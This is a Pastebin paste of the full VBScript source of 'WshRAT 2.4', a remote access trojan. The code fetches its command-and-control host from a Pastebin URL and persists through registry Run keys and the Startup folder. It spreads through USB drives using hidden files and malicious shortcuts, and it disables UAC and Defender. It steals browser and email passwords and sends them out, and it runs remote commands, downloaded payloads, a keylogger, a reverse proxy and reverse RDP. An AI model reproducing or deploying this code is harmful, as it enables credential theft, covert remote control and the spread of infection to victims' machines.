SHARE
TWEET

WshRAT 2.4 Visual Basic

Racco42 Nov 14th, 2019 1,956 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
  2.  
  3. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4.  
  5. host = getHost()
  6. port = 7777
  7. installdir = "%appdata%"
  8. runAsAdmin = false
  9. lnkfile = true
  10. lnkfolder = true
  11. registry = true
  12. startupfold = true
  13. anti_bot = false
  14.  
  15. if anti_bot = true then
  16.     if hwid = "null" then
  17.         wscript.quit
  18.     end if
  19. end if
  20.  
  21. if runAsAdmin = true then
  22.     startupElevate()
  23. end if
  24.  
  25. if WScript.Arguments.Named.Exists("elevated") = true then
  26.     disableSecurity()
  27. end if
  28.  
  29. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  30.  
  31. dim shellobj
  32. set shellobj = wscript.createobject("wscript.shell")
  33. dim filesystemobj
  34. set filesystemobj = createobject("scripting.filesystemobject")
  35. dim httpobj
  36. set httpobj = createobject("msxml2.xmlhttp")
  37.  
  38.  
  39. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  40.  
  41. installname = wscript.scriptname
  42. startup = shellobj.specialfolders ("startup") & "\"
  43. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  44. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  45. spliter = "|"
  46. sdkpath = installdir & "wshsdk"
  47. sdkfile = sdkpath & "\" & chr(112) & chr(121) & chr(116) & chr(104) & chr(111) & chr(110) & chr(46) & chr(101) & chr(120) & chr(101)
  48. sleep = 5000
  49. dim response
  50. dim cmd
  51. dim param
  52. info = ""
  53. usbspreading = ""
  54. startdate = ""
  55. dim oneonce
  56.  
  57. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  58. on error resume next
  59.  
  60.  
  61. instance
  62.  
  63. if getBinder() <> false then
  64.     runBinder()
  65. end if
  66.  
  67. while true
  68.  
  69. install
  70.  
  71. response = ""
  72. response = post ("is-ready","")
  73. cmd = split (response,spliter)
  74. select case cmd (0)
  75. case "disconnect"
  76.       wscript.quit
  77. case "reboot"
  78.       shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUE
  79. case "shutdown"
  80.       shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUE
  81. case "excecute"
  82.       param = cmd (1)
  83.       execute param
  84. case "install-sdk"
  85.       if filesystemobj.fileExists(sdkfile) then
  86.         updatestatus("SDK+Already+Installed")
  87.       else
  88.         installsdk()
  89.       end if
  90. case "get-pass"
  91.        passgrabber cmd(1), "cmdc.exe", cmd(2)
  92. case "get-pass-offline"
  93.       if filesystemobj.fileExists(sdkfile) then
  94.         passgrabber cmd(3), "cmdv.exe", "ie"
  95.         passgrabber "null", "cmdv.exe", "chrome"
  96.         passgrabber "null", "cmdv.exe", "mozilla"
  97.         passgrabber2 cmd(1), "cmdc.exe", cmd(2)
  98.       else
  99.         updatestatus("Installing+SDK")
  100.         stat = installsdk()
  101.         if stat = true then
  102.             passgrabber cmd(3), "cmdv.exe", "ie"
  103.             passgrabber "null", "cmdv.exe", "chrome"
  104.             passgrabber "null", "cmdv.exe", "mozilla"
  105.             passgrabber2 cmd(1), "cmdc.exe", cmd(2)
  106.         else
  107.             msg = shellobj.ExpandEnvironmentStrings("%computername%") & "/" & shellobj.ExpandEnvironmentStrings("%username%")
  108.             post "show-toast", "Unable to automatically recover password for " & msg & " as the Password Recovery SDK cannot be automatically installed. You can try again manually."
  109.         end if
  110.       end if
  111. case "update"
  112.       param = mid(response, instr(response, "|") + 1)
  113.       oneonce.close
  114.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  115.       oneonce.write param
  116.       oneonce.close
  117.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  118.       wscript.quit
  119. case "uninstall"
  120.       uninstall
  121. case "up-n-exec"
  122.       download cmd (1),cmd (2)
  123. case "bring-log"
  124.       upload installdir & "wshlogs\" & cmd (1), "take-log"
  125. case "down-n-exec"
  126.       sitedownloader cmd (1),cmd (2)
  127. case  "filemanager"
  128.       servicestarter cmd(1), "fm-plugin.exe", information()
  129. case  "rdp"
  130.       keyloggerstarter cmd(1), "rd-plugin.exe", information(), "", true
  131. case  "rev-proxy"
  132.       reverseproxy "rprox.exe", cmd(1)
  133. case  "exit-proxy"
  134.       shellobj.run "%comspec% /c taskkill /F /IM rprox.exe", 0, true
  135. case  "keylogger"
  136.       keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0, false
  137. case  "offline-keylogger"
  138.       keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1, false
  139. case  "browse-logs"
  140.       post "is-logs", enumfaf(installdir & "wshlogs")
  141. case  "cmd-shell"
  142.       param = cmd (1)
  143.       post "is-cmd-shell",cmdshell (param)
  144. case  "get-processes"
  145.       post "is-processes", enumprocess()
  146. case  "disable-uac"
  147.       if WScript.Arguments.Named.Exists("elevated") = true then
  148.         set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  149.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0
  150.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0
  151.         oReg.SetDwordValue &H80000002,"SOFTWARE\Policies\Microsoft\Windows Defender","DisableAntiSpyware", 1
  152.         oReg = nothing
  153.         updatestatus("UAC+Disabled+(Reboot+Required)")
  154.       end if
  155. case  "check-eligible"
  156.       if filesystemobj.fileExists(cmd(1)) then
  157.         updatestatus("Is+Eligible")
  158.       else
  159.         updatestatus("Not+Eligible")
  160.       end if
  161. case  "rev-rdp":
  162.       reverserdp cmd(3) & ".exe", cmd(1), cmd(2)
  163. case  "force-eligible"
  164.       if WScript.Arguments.Named.Exists("elevated") = true then
  165.         if filesystemobj.folderExists(cmd(1)) then
  166.             shellobj.run "%comspec% /c " & cmd(2), 0, true
  167.             updatestatus("SUCCESS")
  168.         else
  169.             updatestatus("Component+Missing")
  170.         end if
  171.       else
  172.         updatestatus("Elevation+Required")
  173.       end if
  174. case  "elevate"
  175.       if WScript.Arguments.Named.Exists("elevated") = false then
  176.         on error resume next
  177.         oneonce.close()
  178.         oneonce = nothing
  179.         WScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1
  180.         updatestatus("Client+Elevated")
  181.         WScript.quit
  182.       else
  183.         updatestatus("Client+Elevated")
  184.       end if
  185. case  "if-elevate"
  186.       if WScript.Arguments.Named.Exists("elevated") = false then
  187.         updatestatus("Client+Not+Elevated")
  188.       else
  189.         updatestatus("Client+Elevated")
  190.       end if
  191. case  "kill-process"
  192.       exitprocess(cmd(1))
  193. case  "sleep"
  194.       param = cmd (1)
  195.       sleep = eval (param)        
  196. end select
  197.  
  198. wscript.sleep sleep
  199.  
  200. wend
  201.  
  202. function installsdk()
  203.     on error resume next
  204.     success = false
  205.     sdkurl = post ("moz-sdk","")
  206.     set objhttpdownload = createobject("msxml2.xmlhttp")
  207.     objhttpdownload.open "get",sdkurl, false
  208.     objhttpdownload.setrequestheader "cache-control:", "max-age=0"
  209.     objhttpdownload.send
  210.                          
  211.     if  filesystemobj.fileexists (installdir & "wshsdk.zip") then
  212.         filesystemobj.deletefile (installdir & "wshsdk.zip")
  213.     end if
  214.     if  objhttpdownload.status = 200 then
  215.         dim  objstreamdownload
  216.         set  objstreamdownload = createobject("adodb.stream")
  217.         with objstreamdownload
  218.              .type = 1
  219.              .open
  220.              .write objhttpdownload.responsebody
  221.              .savetofile installdir & "wshsdk.zip"
  222.              .close
  223.         end with
  224.         set objstreamdownload  = nothing
  225.     end if
  226.     if filesystemobj.fileexists(installdir & "wshsdk.zip") then
  227.         'unzip the file
  228.         UnZip installdir & "wshsdk.zip", sdkpath
  229.         success = true
  230.         updatestatus("SDK+Installed")
  231.     end if
  232.     installsdk = success
  233. end function
  234.  
  235. sub install
  236. on error resume next
  237. dim lnkobj
  238. dim filename
  239. dim foldername
  240. dim fileicon
  241. dim foldericon
  242.  
  243. upstart
  244. for each drive in filesystemobj.drives
  245.  
  246. if  drive.isready = true then
  247. if  drive.freespace  > 0 then
  248. if  drive.drivetype  = 1 then
  249.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  250.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  251.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  252.     end if
  253.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  254.         if not lnkfile then exit for
  255.         if  instr (file.name,".") then
  256.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  257.                 file.attributes = 2+4
  258.                 if  ucase (file.name) <> ucase (installname) then
  259.                     filename = split(file.name,".")
  260.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  261.                     lnkobj.windowstyle = 7
  262.                     lnkobj.targetpath = "cmd.exe"
  263.                     lnkobj.workingdirectory = ""
  264.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  265.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  266.                     if  instr (fileicon,",") = 0 then
  267.                         lnkobj.iconlocation = file.path
  268.                     else
  269.                         lnkobj.iconlocation = fileicon
  270.                     end if
  271.                     lnkobj.save()
  272.                 end if
  273.             end if
  274.         end if
  275.     next
  276.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  277.         if not lnkfolder then exit for
  278.         folder.attributes = 2+4
  279.         foldername = folder.name
  280.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  281.         lnkobj.windowstyle = 7
  282.         lnkobj.targetpath = "cmd.exe"
  283.         lnkobj.workingdirectory = ""
  284.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  285.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  286.         if  instr (foldericon,",") = 0 then
  287.             lnkobj.iconlocation = folder.path
  288.         else
  289.             lnkobj.iconlocation = foldericon
  290.         end if
  291.         lnkobj.save()
  292.     next
  293. end If
  294. end If
  295. end if
  296. next
  297. err.clear
  298. end sub
  299.  
  300. sub uninstall
  301. on error resume next
  302. dim filename
  303. dim foldername
  304.  
  305. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  306. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  307. filesystemobj.deletefile startup & installname ,true
  308. filesystemobj.deletefile wscript.scriptfullname ,true
  309.  
  310. for  each drive in filesystemobj.drives
  311. if  drive.isready = true then
  312. if  drive.freespace  > 0 then
  313. if  drive.drivetype  = 1 then
  314.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
  315.          on error resume next
  316.          if  instr (file.name,".") then
  317.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  318.                  file.attributes = 0
  319.                  if  ucase (file.name) <> ucase (installname) then
  320.                      filename = split(file.name,".")
  321.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  322.                  else
  323.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  324.                  end If
  325.              else
  326.                  filesystemobj.deletefile (file.path)
  327.              end if
  328.          end if
  329.      next
  330.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  331.          folder.attributes = 0
  332.      next
  333. end if
  334. end if
  335. end if
  336. next
  337. wscript.quit
  338. end sub
  339.  
  340. function post (cmd ,param)
  341.  
  342. post = param
  343. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  344. httpobj.setrequestheader "user-agent:",information
  345. httpobj.send param
  346. post = httpobj.responsetext
  347. end function
  348.  
  349. function information
  350. on error resume next
  351. if  inf = "" then
  352.     inf = hwid & spliter
  353.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  354.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  355.  
  356.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  357.     set os = root.execquery ("select * from win32_operatingsystem")
  358.     for each osinfo in os
  359.        inf = inf & osinfo.caption & spliter  
  360.        exit for
  361.     next
  362.     inf = inf & "plus" & spliter
  363.     inf = inf & security & spliter
  364.     inf = inf & usbspreading
  365.     inf = "WSHRAT" & spliter & inf & spliter & "Visual Basic-v2.4" & spliter & getCountry()
  366.     information = inf
  367. else
  368.     information = inf
  369. end if
  370. end function
  371.  
  372. function getHost()
  373.     phost = "http://pastebin.com/raw/WMWTqMa3"
  374.     if instr(phost, "http://") = 1 then
  375.         on error resume next
  376.         set objhttpdownload = CreateObject("msxml2.xmlhttp" )
  377.         objhttpdownload.open "get", phost, false
  378.         objhttpdownload.setRequestHeader "user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
  379.         objhttpdownload.send
  380.        
  381.         if objhttpdownload.status = 200 then
  382.             set objstreamdownload = CreateObject("adodb.stream")
  383.             objstreamdownload.Type = 1
  384.             objstreamdownload.Open
  385.             objstreamdownload.Write(objhttpdownload.responseBody)
  386.             objstreamdownload.Position = 0
  387.             objstreamdownload.Type = 2
  388.             objstreamdownload.CharSet = "us-ascii"
  389.             phost = objstreamdownload.ReadText
  390.             objstreamdownload.close
  391.             set objstreamdownload = nothing
  392.             getHost = phost
  393.         end if
  394.     else
  395.         getHost = phost
  396.     end if
  397. end function
  398.  
  399. function getCountry()
  400.     on error resume next
  401.     set objhttpdownload = createobject("msxml2.xmlhttp" )
  402.     objhttpdownload.open "get", "http://ip-api.com/json/", false
  403.     objhttpdownload.setRequestHeader "user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
  404.     objhttpdownload.send
  405.      
  406.     if objhttpdownload.status = 200 then
  407.        dim  objstreamdownload, raw, cc, cn
  408.        set  objstreamdownload = createobject("adodb.stream")
  409.        with objstreamdownload
  410.             .type = 1
  411.             .open
  412.             .write objhttpdownload.responsebody
  413.             .position = 0
  414.             .type = 2
  415.             .charset = "us-ascii"
  416.             raw = .readtext
  417.        end with
  418.        set objstreamdownload = nothing
  419.     end if
  420.     cc = "01"
  421.     cn = "Unknown"
  422.     cc = mid(raw, instr(raw, "countryCode") + 14)
  423.     cc = mid(cc, 1, instr(cc, chr(34)) -1)
  424.    
  425.     cn = mid(raw, instr(raw, "country") + 10)
  426.     cn = mid(cn, 1, instr(cn, chr(34)) -1)
  427.            
  428.     getCountry = cc & ":" & cn
  429. end function
  430.  
  431. sub upstart ()
  432. on error resume Next
  433. if registry = true then
  434. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  435. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  436. end if
  437.  
  438. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  439. if startupfold = true then
  440. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  441. end if
  442. end sub
  443.  
  444.  
  445. function hwid
  446. on error resume next
  447.  
  448. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  449. set disks = root.execquery ("select * from win32_logicaldisk")
  450. for each disk in disks
  451.     if  disk.volumeserialnumber <> "" then
  452.         hwid = disk.volumeserialnumber
  453.         exit for
  454.     end if
  455. next
  456. end function
  457.  
  458.  
  459. function security
  460. on error resume next
  461.  
  462. security = ""
  463.  
  464. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  465. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  466. for each objitem in colitems
  467.     versionstr = split (objitem.version,".")
  468. next
  469. versionstr = split (colitems.version,".")
  470. osversion = versionstr (0) & "."
  471. for  x = 1 to ubound (versionstr)
  472.      osversion = osversion &  versionstr (i)
  473. next
  474. osversion = eval (osversion)
  475. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  476.  
  477. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  478. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  479.  
  480. for each objantivirus in colantivirus
  481.     security  = security  & objantivirus.displayname & " ."
  482. next
  483. if security  = "" then security  = "nan-av"
  484. end function
  485.  
  486. function instance
  487. on error resume next
  488.  
  489. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  490. if usbspreading = "" then
  491.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  492.       usbspreading = "true - " & date
  493.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  494.    else
  495.       usbspreading = "false - " & date
  496.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  497.  
  498.    end if
  499. end If
  500.  
  501. upstart
  502. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  503. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  504. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  505.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  506.     wscript.quit
  507. end If
  508. err.clear
  509. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  510. if  err.number > 0 then wscript.quit
  511. end function
  512.  
  513. sub startupElevate()
  514.     if WScript.Arguments.Named.Exists("elevated") = false then
  515.         on error resume next
  516.         WScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1
  517.         WScript.quit
  518.     end if
  519. end sub
  520.  
  521. sub disableSecurity()
  522.     if WScript.Arguments.Named.Exists("elevated") = true then
  523.         set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  524.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0
  525.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0
  526.         oReg = nothing
  527.     end if
  528. end sub
  529.  
  530. function decode_base64(base64_string)
  531.     Set yhm_pepe = CreateObject("ADODB.Stream")
  532.     Set spike = CreateObject("Microsoft.XMLDOM").createElement("tmp")
  533.     spike.DataType = "bin.base64"
  534.     spike.Text = base64_string
  535.     yhm_pepe.Type = 1
  536.     yhm_pepe.Open
  537.     yhm_pepe.Write spike.NodeTypedValue
  538.     yhm_pepe.Position = 0
  539.     yhm_pepe.Type = 2
  540.     yhm_pepe.CharSet = "us-ascii"
  541.     decode_base64 = yhm_pepe.ReadText
  542. end function
  543.  
  544. sub decode_pass(retcmd)
  545.     dim content, nss, command
  546.     if retcmd = "mozilla" then
  547.         command = "give-me-ffpv"
  548.     elseif retcmd = "chrome" then
  549.         command = "give-me-chpv"
  550.     elseif retcmd = "foxmail" then
  551.         command = "give-me-fm"
  552.     end if
  553.     set objhttpdownload = createobject("msxml2.xmlhttp")
  554.     set objfsodownload = createobject ("scripting.filesystemobject")
  555.     objhttpdownload.open "post","http://" & host & ":" & port &"/" & command, false
  556.     objhttpdownload.setrequestheader "user-agent:",information
  557.     objhttpdownload.send ""
  558.                          
  559.     if  objfsodownload.fileexists (installdir & "rundll") then
  560.         objfsodownload.deletefile (installdir & "rundll")
  561.     end if
  562.     if  objhttpdownload.status = 200 then
  563.         dim  objstreamdownload
  564.         set  objstreamdownload = createobject("adodb.stream")
  565.         with objstreamdownload
  566.              .type = 1
  567.              .open
  568.              .write objhttpdownload.responsebody
  569.              .position = 0
  570.              .type = 2
  571.              .charset = "us-ascii"
  572.              content = .readtext
  573.              nss = sdkpath & "\nss"
  574.              content = Replace(content, "%nss%", nss) 'for firefox
  575.              content = Replace(content, "%path%", installdir & "Login Data") 'for chrome
  576.              objfsodownload.opentextfile(installdir & "rundll", 2, true).write(content)
  577.              .close
  578.         end with
  579.         set objstreamdownload  = nothing
  580.     end if
  581.    
  582.     shellobj.run "%comspec% /c cd " & chr(34) & sdkpath & chr(34) & " && " &  gsp(sdkfile) & " " & gsp(installdir & "rundll") & " > " & chr(34) & installdir & "wshout" & chr(34), 0, true
  583.     wscript.sleep(2000)
  584.     content = objfsodownload.opentextfile(installdir & "wshout").readall
  585.     objfsodownload.deletefile (installdir & "rundll")
  586.     objfsodownload.deletefile (installdir & "wshout")
  587.     post retcmd, content
  588. end sub
  589.  
  590. function gsp(path)
  591.     gsp = filesystemobj.getfile(path).shortpath
  592. end function
  593.  
  594. sub passgrabber (fileurl, filename, retcmd)
  595. on error resume next
  596. dim content, profile, folder
  597. set objfsodownload = createobject ("scripting.filesystemobject")
  598. if retcmd = "ie" then
  599.     content = decode_base64(fileurl)
  600.     executeglobal content
  601.     return
  602. elseif retcmd = "chrome" then
  603.     folder = shellobj.expandenvironmentstrings("%temp%")
  604.     folder = mid(folder, 1, instr(lcase(folder), "temp") - 1) & "Google\Chrome\User Data\Default\Login Data"
  605.     if  objfsodownload.fileexists(folder) then
  606.         objfsodownload.copyfile folder, installdir & "Login Data", true
  607.        
  608.         if objfsodownload.fileexists(sdkfile) then
  609.             'proceed decoding
  610.             decode_pass(retcmd)
  611.             objfsodownload.deletefile(installdir & "Login Data")
  612.         else
  613.             'request for sdk
  614.             post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  615.         end if
  616.     else
  617.         post retcmd, "No Password Found"
  618.     end if
  619. elseif retcmd = "foxmail" then 
  620.     if objfsodownload.fileexists(sdkfile) then
  621.         'proceed decoding
  622.         decode_pass(retcmd)
  623.     else
  624.         'request for sdk
  625.         post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  626.     end if
  627. elseif retcmd = "mozilla" then
  628.     folder = shellobj.expandenvironmentstrings("%appdata%") & "\Mozilla\Firefox\"
  629.     if  objfsodownload.fileexists (folder & "profiles.ini") then
  630.         content = filesystemobj.openTextFile(folder & "profiles.ini").readall
  631.         if instr(content, "Path=") > 0 then
  632.             content = mid(content, instr(content, "Path=") + 5)
  633.             content = mid(content, 1, instr(content, vbCrLf) - 1)
  634.             profile = Replace(folder & content, "/", "\")
  635.             folder = profile & "\logins.json"
  636.  
  637.             'check if moz-sdk exists, if not, request for it
  638.             if objfsodownload.fileexists(sdkfile) then
  639.                 'proceed decoding
  640.                 decode_pass(retcmd)
  641.             else
  642.                 'request for sdk
  643.                 post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  644.             end if
  645.         else
  646.             post retcmd, "No Password Found"
  647.         end if
  648.     else
  649.         post retcmd, "No Password Found"
  650.     end if
  651. else
  652.     passgrabber2 fileurl, filename, retcmd
  653. end if
  654.  
  655. end sub
  656.  
  657. Sub UnZip(zipfile, ExtractTo)
  658.     if filesystemobj.GetExtensionName(zipfile) = "zip" then
  659.         If NOT filesystemobj.FolderExists(ExtractTo) Then
  660.             filesystemobj.CreateFolder(ExtractTo)
  661.         End If
  662.         set objShell = CreateObject("Shell.Application")
  663.         set destination = objShell.NameSpace(ExtractTo)
  664.         set zip_content = objShell.NameSpace(zipfile).Items  
  665.         for i = 0 to zip_content.count - 1
  666.             if (filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))) then
  667.                 filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))
  668.             end if
  669.             destination.copyHere zip_content.item(i), 20
  670.         next
  671.     End if
  672. End Sub
  673.  
  674. sub passgrabber2 (fileurl, filename, retcmd)
  675.  
  676. on error resume next
  677. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  678. filesystemobj.deleteFile(installdir & filename & "data")
  679. config_file = installdir & mid(filename, 1, instrrev(filename, ".")) & ".cfg"
  680. cfg = "[General]" & vbcrlf & "ShowGridLines=0" & vbcrlf & "SaveFilterIndex=0" & vbcrlf & "ShowInfoTip=1" & vbcrlf & "UseProfileFolder=0" & vbcrlf & "ProfileFolder=" & vbcrlf & "MarkOddEvenRows=0" & vbcrlf & "WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00" & vbcrlf & "Columns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00" & vbcrlf & "Sort=0"
  681. 'write config
  682. set writer = filesystemobj.openTextFile(config_file, 2, true)
  683. writer.writeLine(cfg)
  684. writer.close()
  685. set writer = nothing
  686.  
  687. strlink = fileurl
  688. strsaveto = installdir & filename
  689.  
  690.  
  691. set objfsodownload = createobject ("scripting.filesystemobject")
  692. if  objfsodownload.fileexists (strsaveto) then
  693.     objfsodownload.deletefile (strsaveto)
  694. end if
  695.  
  696.  dim  objstreamdownload
  697.  set  objstreamdownload = createobject("adodb.stream")
  698.  with objstreamdownload
  699.         .type = 1
  700.         .open
  701.         .write getMailRec()
  702.         .savetofile strsaveto & ".zip", 2
  703.         .close
  704.    end with
  705.    set objstreamdownload = nothing
  706.  
  707. if objfsodownload.fileexists(strsaveto & ".zip") then
  708.    UnZip strsaveto & ".zip", installdir
  709.    set runner = CreateObject("Shell.Application")
  710.    saver = objfsodownload.getFile(strsaveto).shortPath
  711.    
  712.    'try 10 times before give up
  713.   for i = 0 to 4
  714.     shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  715.     wscript.sleep(1000)
  716.     runner.shellexecute saver, " /stext " & saver & "data"
  717.     wscript.sleep(2000)
  718.    
  719.     if objfsodownload.fileExists(saver & "data") then
  720.         dim  httpobj,objstreamuploade,buffer, outpath, folder
  721.         set  objstreamuploade = createobject("adodb.stream")
  722.         with objstreamuploade
  723.              .type = 2
  724.              .open
  725.              .loadfromfile saver & "data"
  726.              buffer = .readtext
  727.              .close
  728.         end with
  729.         set objstreamuploade = nothing
  730.            
  731.         outpath = installdir & "wshlogs\recovered_password_email.log"
  732.        
  733.         folder = objfsodownload.GetParentFolderName(outpath)
  734.  
  735.         if not objfsodownload.FolderExists(folder) then
  736.             shellobj.run "%comspec% /c mkdir " & chr(34) & folder & chr(34), 0, true
  737.         end if
  738.         set writer = filesystemobj.openTextFile(outpath, 2, true)
  739.         writer.write(buffer)
  740.         writer.close()
  741.         set writer = nothing
  742.         upload saver & "data", retcmd
  743.         exit for
  744.     end if
  745.    next
  746.    deletefaf(strsaveto)
  747. end if
  748.  
  749. end sub
  750.  
  751. sub reverseproxy (filename, filearg)
  752. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  753. strsaveto = installdir & filename
  754.  
  755. set objfsodownload = createobject ("scripting.filesystemobject")
  756. if  objfsodownload.fileexists (strsaveto) then
  757.     objfsodownload.deletefile (strsaveto)
  758. end if
  759.  
  760. dim  objstreamdownload
  761. set  objstreamdownload = createobject("adodb.stream")
  762. with objstreamdownload
  763.     .type = 1
  764.     .open
  765.     .write getReverseProxy()
  766.     .savetofile strsaveto
  767.     .close
  768. end with
  769. set objstreamdownload = nothing
  770.  
  771. if objfsodownload.fileexists(strsaveto) then
  772.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & filearg
  773. end if
  774. end sub
  775.  
  776. sub reverserdp(filename, filearg, fileurl)
  777. on error resume next
  778. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  779. strsaveto = installdir & filename
  780.  
  781. set objhttpdownload = CreateObject("msxml2.serverxmlhttp")
  782. objhttpdownload.open "get", fileurl, false
  783. objhttpdownload.setRequestHeader "cache-control", "max-age=0"
  784. objhttpdownload.send
  785.    
  786. set objfsodownload = CreateObject("scripting.filesystemobject")
  787. if objfsodownload.fileExists(strsaveto) then
  788.     objfsodownload.deleteFile(strsaveto)
  789. end if
  790.  
  791. set objstreamdownload = CreateObject("adodb.stream")
  792. objstreamdownload.Type = 1
  793. objstreamdownload.Open
  794. objstreamdownload.Write(objhttpdownload.responseBody)
  795. objstreamdownload.SaveToFile(strsaveto)
  796. objstreamdownload.close
  797.    
  798. set objstreamdownload = nothing
  799.  
  800. if objfsodownload.fileExists(strsaveto) then
  801.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & filearg
  802. end if
  803. end sub
  804.  
